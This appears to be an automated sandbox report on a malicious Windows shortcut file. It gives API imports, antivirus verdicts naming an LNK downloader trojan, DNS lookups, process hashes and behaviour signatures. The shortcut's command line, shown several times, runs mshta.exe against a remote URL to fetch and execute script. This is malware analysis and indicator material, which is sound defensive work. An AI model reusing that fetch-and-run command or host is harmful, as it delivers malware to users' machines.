api-ms-win-downlevel-advapi32-l1-1-0.dll.RegQueryValueExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventActivityIdControl
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCreateKeyExW
iphlpapi.dll.GetBestInterfaceEx
iphlpapi.dll.GetIfEntry2
api-ms-win-downlevel-shlwapi-l2-1-0.dll.SHGetValueA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegSetValueExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegDeleteValueW
urlmon.dll.CoInternetGetSession
urlmon.dll.#471
ws2_32.dll.#23
api-ms-win-downlevel-shlwapi-l2-1-0.dll.SHStrDupW
ole32.dll.CoTaskMemAlloc
ws2_32.dll.#21
ws2_32.dll.WSAIoctl
ws2_32.dll.#3
ws2_32.dll.#116
iphlpapi.dll.NotifyIpInterfaceChange
iphlpapi.dll.NotifyUnicastIpAddressChange
dnsapi.dll.DnsGetProxyInformation
rpcrt4.dll.NdrClientCall2
rpcrt4.dll.RpcStringBindingComposeW
rpcrt4.dll.RpcBindingFromStringBindingW
rpcrt4.dll.RpcStringFreeW
rpcrt4.dll.RpcBindingFree
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventWrite
iphlpapi.dll.GetAdaptersAddresses
ws2_32.dll.GetAddrInfoW
oleaut32.dll.#8
urlmon.dll.CoInternetCreateSecurityManager
urlmon.dll.CoInternetCreateZoneManager
ole32.dll.CoInitializeEx
ole32.dll.CoUninitialize
ole32.dll.CoRegisterInitializeSpy
oleacc.dll.LresultFromObject
ws2_32.dll.GetAddrInfoExW
user32.dll.GetGUIThreadInfo
user32.dll.GetCursorInfo
user32.dll.GetWindowInfo
user32.dll.GetTitleBarInfo
user32.dll.GetScrollBarInfo
user32.dll.GetComboBoxInfo
user32.dll.GetAncestor
user32.dll.RealChildWindowFromPoint
user32.dll.RealGetWindowClassW
user32.dll.GetAltTabInfoW
user32.dll.GetListBoxInfo
user32.dll.GetMenuBarInfo
user32.dll.SendInput
user32.dll.BlockInput
user32.dll.LogicalToPhysicalPoint
user32.dll.PhysicalToLogicalPoint
user32.dll.WindowFromPhysicalPoint
user32.dll.GetPhysicalCursorPos
kernel32.dll.GetModuleFileNameW
kernel32.dll.VirtualAllocEx
kernel32.dll.VirtualFreeEx
ntdll.dll.NtQueryInformationProcess
ntdll.dll.NtAllocateVirtualMemory
ntdll.dll.NtFreeVirtualMemory
oleaut32.dll.DllGetClassObject
oleaut32.dll.DllCanUnloadNow
sxs.dll.SxsOleAut32MapIIDToProxyStubCLSID
advapi32.dll.RegQueryValueW
oleacc.dll.ObjectFromLresult
advapi32.dll.RegOpenKeyW
iphlpapi.dll.ConvertInterfaceGuidToLuid
iphlpapi.dll.GetIpForwardTable2
iphlpapi.dll.GetIpNetEntry2
iphlpapi.dll.FreeMibTable
api-ms-win-downlevel-ole32-l1-1-0.dll.StringFromIID
api-ms-win-downlevel-ole32-l1-1-0.dll.CoUninitialize
ole32.dll.RegisterDragDrop
api-ms-win-downlevel-ole32-l1-1-0.dll.CoSetProxyBlanket
ole32.dll.ObjectStublessClient10
oleaut32.dll.#2
ole32.dll.CoTaskMemFree
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegEnumKeyExW
urlmon.dll.#407
urlmon.dll.#446
api-ms-win-downlevel-ole32-l1-1-0.dll.CoWaitForMultipleHandles
msls31.dll.#62
msls31.dll.#63
msls31.dll.#66
msls31.dll.#61
msls31.dll.#71
msls31.dll.#1
msls31.dll.#49
msls31.dll.#52
msls31.dll.#48
msls31.dll.#3
d2d1.dll.#1
dwrite.dll.DWriteCreateFactory
dxgi.dll.CreateDXGIFactory1
gdi32.dll.D3DKMTOpenAdapterFromGdiDisplayName
gdi32.dll.D3DKMTCloseAdapter
gdi32.dll.D3DKMTQueryAdapterInfo
gdi32.dll.D3DKMTOpenAdapterFromDeviceName
setupapi.dll.SetupDiGetClassDevsW
setupapi.dll.SetupDiEnumDeviceInterfaces
setupapi.dll.SetupDiGetDeviceInterfaceDetailW
setupapi.dll.SetupDiDestroyDeviceInfoList
setupapi.dll.SetupDiGetDevicePropertyW
wintrust.dll.WinVerifyTrust
d3d11.dll.D3D11CreateDevice
dxgi.dll.CompatValue
d3d10warp.dll.D3DKMTOpenAdapterFromGdiDisplayName
d3d10warp.dll.D3DKMTOpenAdapterFromDeviceName
d3d10warp.dll.D3DKMTGetDisplayModeList
d3d10warp.dll.D3DKMTSetVidPnSourceOwner
d3d10warp.dll.D3DKMTSetDisplayMode
d3d10warp.dll.D3DKMTCloseAdapter
d3d10warp.dll.D3DKMTSetGammaRamp
d3d10warp.dll.D3DKMTGetDeviceState
d3d10warp.dll.D3DKMTQueryAdapterInfo
d3d10warp.dll.D3DKMTWaitForVerticalBlankEvent
gdi32.dll.D3DKMTCreateDCFromMemory
gdi32.dll.D3DKMTDestroyDCFromMemory
gdi32.dll.D3DKMTCheckVidPnExclusiveOwnership
gdi32.dll.D3DKMTCheckMonitorPowerState
gdi32.dll.D3DKMTCheckSharedResourceAccess
d3d10warp.dll.D3DKMTGetMultisampleMethodList
d3d10warp.dll.D3DKMTSetDisplayPrivateDriverFormat
d3d10warp.dll.D3DKMTDestroySynchronizationObject
d3d10warp.dll.D3DKMTCreateSynchronizationObject
d3d10warp.dll.D3DKMTDestroyContext
d3d10warp.dll.D3DKMTCreateContext
d3d10warp.dll.D3DKMTGetContextSchedulingPriority
d3d10warp.dll.D3DKMTSetContextSchedulingPriority
d3d10warp.dll.D3DKMTPresent
d3d10warp.dll.D3DKMTDestroyDevice
d3d10warp.dll.D3DKMTCreateDevice
d3d10warp.dll.D3DKMTQueryAllocationResidency
d3d10warp.dll.D3DKMTSetAllocationPriority
d3d10warp.dll.D3DKMTDestroyAllocation
d3d10warp.dll.D3DKMTOpenResource
d3d10warp.dll.D3DKMTQueryResourceInfo
d3d10warp.dll.D3DKMTCreateAllocation
d3d10warp.dll.D3DKMTSignalSynchronizationObject
d3d10warp.dll.D3DKMTWaitForSynchronizationObject
d3d10warp.dll.D3DKMTEscape
d3d10warp.dll.D3DKMTUnlock
d3d10warp.dll.D3DKMTLock
d3d10warp.dll.D3DKMTRender
d3d10warp.dll.OpenAdapter10_2
d3d10warp.dll.#199
urlmon.dll.#421
urlmon.dll.#408
msls31.dll.#44
msls31.dll.#5
urlmon.dll.#513
user32.dll.IsWindowRedirectedForPrint
d2d1.dll.#5
oleaut32.dll.#10
"C:\Windows\System32\msHta.Exe" http://www.d01fa.net/images/D817583E/16364/11542/7f1c8663/0387a17
C:\Users\Rebecca\AppData\Local\Temp\file.lnk
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
CicLoadWinStaWinSta0
Local\MSCTF.CtfMonitorInstMutexDefault1
!IECompat!Mutex

Flags

Icon ..\..\..\Windows\System32\cftmo.exe
CMD line http://www.d01fa.net/images/D817583E/16364/11542/7f1c8663/0387a17
Icon %SystemRoot%\system32\SHELL32.dll

Windows
System32
cftmo.exe
C:\Windows\System32\cftmo.exe
%windir%\system32\cftmo.exe
1SPS0
user-pc
Windows
System32
msHta.Exe
#..\..\..\Windows\System32\cftmo.exe
%windir%Ahttp://www.d01fa.net/images/D817583E/16364/11542/7f1c8663/0387a17!%SystemRoot%\system32\SHELL32.dll
%windir%\system32\cftmo.exe
cftmo.exe
Application
S-1-5-21-2108907110-3666731302-1928028421-1000
System32 (C:\Windows)
C:\Windows\System32\cftmo.exe

Full Results

Engine Signature Engine Signature Engine Signature
Bkav Clean MicroWorld-eScan Heur.BZC.YAX.Nioc.1.0443ACBC CMC Clean
CAT-QuickHeal Clean McAfee LNK/Agent-FSDJ!3AB538915574 Malwarebytes Clean
Zillya Clean SUPERAntiSpyware Clean Sangfor Malware
K7AntiVirus Clean K7GW Clean Arcabit Heur.BZC.YAX.Nioc.1.0443ACBC
BitDefenderTheta Clean F-Prot LNK/Trojan.GPQC-4 Symantec Trojan.Gen.NPE
ESET-NOD32 Clean Baidu Clean TrendMicro-HouseCall Clean
Avast Other:Malware-gen [Trj] ClamAV Clean Kaspersky HEUR:Trojan.WinLNK.Agent.gen
BitDefender Heur.BZC.YAX.Nioc.1.0443ACBC NANO-Antivirus Clean AegisLab Clean
Tencent Clean Ad-Aware Heur.BZC.YAX.Nioc.1.0443ACBC Sophos Troj/DownLnk-X
Comodo Clean F-Secure Clean DrWeb Trojan.DownLoader33.28040
VIPRE Clean TrendMicro Clean McAfee-GW-Edition LNK/Agent-FSDJ!3AB538915574
FireEye Heur.BZC.YAX.Nioc.1.0443ACBC Emsisoft Heur.BZC.YAX.Nioc.1.0443ACBC (B) SentinelOne Clean
Cyren LNK/Trojan.GPQC-4 Jiangmin Clean Avira Clean
Antiy-AVL Clean Kingsoft Clean Microsoft Trojan:Script/Wacatac.C!ml
ViRobot Clean ZoneAlarm Trojan.Multi.GenAutorunLnkFile.a Avast-Mobile Clean
GData Heur.BZC.YAX.Nioc.1.0443ACBC TACHYON Clean AhnLab-V3 Clean
VBA32 Clean ALYac Trojan.Downloader.LnK.Gen MAX malware (ai score=88)
Zoner Clean Rising Downloader.Mshta/LNK!1.BADA (CLASSIC) Yandex Clean
Ikarus Trojan.Agent MaxSecure Clean Fortinet Clean
AVG Other:Malware-gen [Trj] Panda Clean Qihoo-360 Generic/Trojan.066
Sorry! No behavior.

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
Y 1.1.1.1 [VT] Australia

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.1.2 60934 1.1.1.1 53
192.168.1.2 61170 1.1.1.1 53
192.168.1.2 64006 1.1.1.1 53
192.168.1.2 137 192.168.1.255 137
192.168.1.2 60934 8.8.8.8 53
192.168.1.2 61170 8.8.8.8 53
192.168.1.2 64006 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
www.d01fa.net [VT] 5.181.156.24 [VT]

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

Sorry! No dropped files.
Sorry! No CAPE files.
Process Name mshta.exe
PID 984
Dump Size 13312 bytes
Module Path C:\Windows\System32\mshta.exe
Type PE image: 32-bit executable
PE timestamp 2013-10-14 05:50:08
MD5 18626c2bdc764f32a3e08e899af118af
SHA1 32cad11d58271eb74a9ac5a37c367d08923571e4
SHA256 691d5430f9b4fdfd7cf8e1598a883d3076e9eacb37b4473ce433d323bb1c0c8d
CRC32 091B53BC
Ssdeep 192:cjF76fEEnTdt9TTAzYkoeO+T1MYDJWwelJIRBU:yEnTdTA8kolsWw6
Dump Filename 691d5430f9b4fdfd7cf8e1598a883d3076e9eacb37b4473ce433d323bb1c0c8d
Download Download Zip

BinGraph Download graph

Process Name cmd.exe
PID 1172
Dump Size 302592 bytes
Module Path C:\Windows\System32\cmd.exe
Type PE image: 32-bit executable
PE timestamp 2010-11-20 09:00:27
MD5 27e3c14c07d707082db00971254cb414
SHA1 dcf66d76300269f2efbcf9ba0107b9b0090e9b2d
SHA256 d4babf14995abf1094988b0abb864afbd3cca1d9f6c5af15fa0c1b75ce86b4c0
CRC32 90302820
Ssdeep 3072:7GIe1sk8k8ir/PDuY0dpcJzT/kXrQcMKdM4MQkljyGez1c:6jsLiTruFiJUbQcDLMQklmt+
Dump Filename d4babf14995abf1094988b0abb864afbd3cca1d9f6c5af15fa0c1b75ce86b4c0
Download Download Zip

BinGraph Download graph

Defense Evasion Execution
  • T1064 - Scripting
    • Signature - script_network_activity
  • T1064 - Scripting
    • Signature - script_network_activity

    Processing ( 11.522 seconds )

    • 5.236 Suricata
    • 4.91 NetworkAnalysis
    • 0.809 BehaviorAnalysis
    • 0.283 VirusTotal
    • 0.115 CAPE
    • 0.107 Deduplicate
    • 0.029 ProcDump
    • 0.023 AnalysisInfo
    • 0.005 Debug
    • 0.003 Dropped
    • 0.002 TargetInfo

    Signatures ( 1.6099999999999974 seconds )

    • 0.487 antiav_detectreg
    • 0.165 infostealer_ftp
    • 0.16 territorial_disputes_sigs
    • 0.1 antianalysis_detectreg
    • 0.092 infostealer_im
    • 0.054 antivm_vbox_keys
    • 0.048 antidbg_windows
    • 0.035 antivm_vmware_keys
    • 0.031 infostealer_mail
    • 0.027 antivm_parallels_keys
    • 0.026 antivm_xen_keys
    • 0.02 stealth_timeout
    • 0.019 api_spamming
    • 0.019 antivm_vpc_keys
    • 0.018 decoy_document
    • 0.017 antivm_generic_scsi
    • 0.017 antivm_generic_diskreg
    • 0.014 NewtWire Behavior
    • 0.014 ransomware_files
    • 0.013 geodo_banking_trojan
    • 0.009 bypass_firewall
    • 0.008 antiav_detectfile
    • 0.008 antivm_xen_keys
    • 0.008 antivm_hyperv_keys
    • 0.008 ransomware_extensions
    • 0.007 antivm_generic_services
    • 0.006 kibex_behavior
    • 0.006 persistence_autorun
    • 0.006 OrcusRAT Behavior
    • 0.006 recon_programs
    • 0.006 ketrican_regkeys
    • 0.005 betabot_behavior
    • 0.005 blackrat_registry_keys
    • 0.005 antianalysis_detectfile
    • 0.005 antivm_generic_system
    • 0.005 darkcomet_regkeys
    • 0.005 infostealer_bitcoin
    • 0.005 masquerade_process_name
    • 0.005 limerat_regkeys
    • 0.005 recon_fingerprint
    • 0.004 Extraction
    • 0.004 antiemu_wine_func
    • 0.004 antivm_generic_disk
    • 0.004 dynamic_function_loading
    • 0.004 antivm_generic_bios
    • 0.003 Doppelganging
    • 0.003 InjectionCreateRemoteThread
    • 0.003 exploit_heapspray
    • 0.003 injection_createremotethread
    • 0.003 injection_runpe
    • 0.003 malicious_dynamic_function_loading
    • 0.003 antivm_vbox_files
    • 0.003 browser_security
    • 0.003 disables_browser_warn
    • 0.003 warzonerat_regkeys
    • 0.003 remcos_regkeys
    • 0.002 InjectionProcessHollowing
    • 0.002 antidebug_guardpages
    • 0.002 bootkit
    • 0.002 uac_bypass_eventvwr
    • 0.002 dridex_behavior
    • 0.002 exec_crash
    • 0.002 infostealer_browser_password
    • 0.002 kovter_behavior
    • 0.002 mimics_filetime
    • 0.002 reads_self
    • 0.002 virus
    • 0.002 network_torgateway
    • 0.002 medusalocker_regkeys
    • 0.001 InjectionInterProcess
    • 0.001 InjectionSetWindowLong
    • 0.001 antiav_avast_libs
    • 0.001 antisandbox_script_timer
    • 0.001 antivm_vbox_libs
    • 0.001 antivm_vbox_window
    • 0.001 exploit_getbasekerneladdress
    • 0.001 exploit_gethaldispatchtable
    • 0.001 hancitor_behavior
    • 0.001 network_tor
    • 0.001 rat_nanocore
    • 0.001 shifu_behavior
    • 0.001 stack_pivot
    • 0.001 stealth_file
    • 0.001 tinba_behavior
    • 0.001 antidbg_devices
    • 0.001 antivm_generic_cpu
    • 0.001 antivm_vmware_files
    • 0.001 banker_zeus_mutex
    • 0.001 browser_addon
    • 0.001 modify_proxy
    • 0.001 disables_system_restore
    • 0.001 predatorthethief_files
    • 0.001 qulab_files
    • 0.001 modify_security_center_warnings
    • 0.001 modify_uac_prompt
    • 0.001 network_dns_opennic
    • 0.001 packer_armadillo_regkey
    • 0.001 persistence_shim_database
    • 0.001 nemty_regkeys
    • 0.001 revil_mutexes
    • 0.001 stealth_hiddenreg

    Reporting ( 3.4849999999999994 seconds )

    • 3.421 BinGraph
    • 0.062 MITRE_TTPS
    • 0.002 PCAP2CERT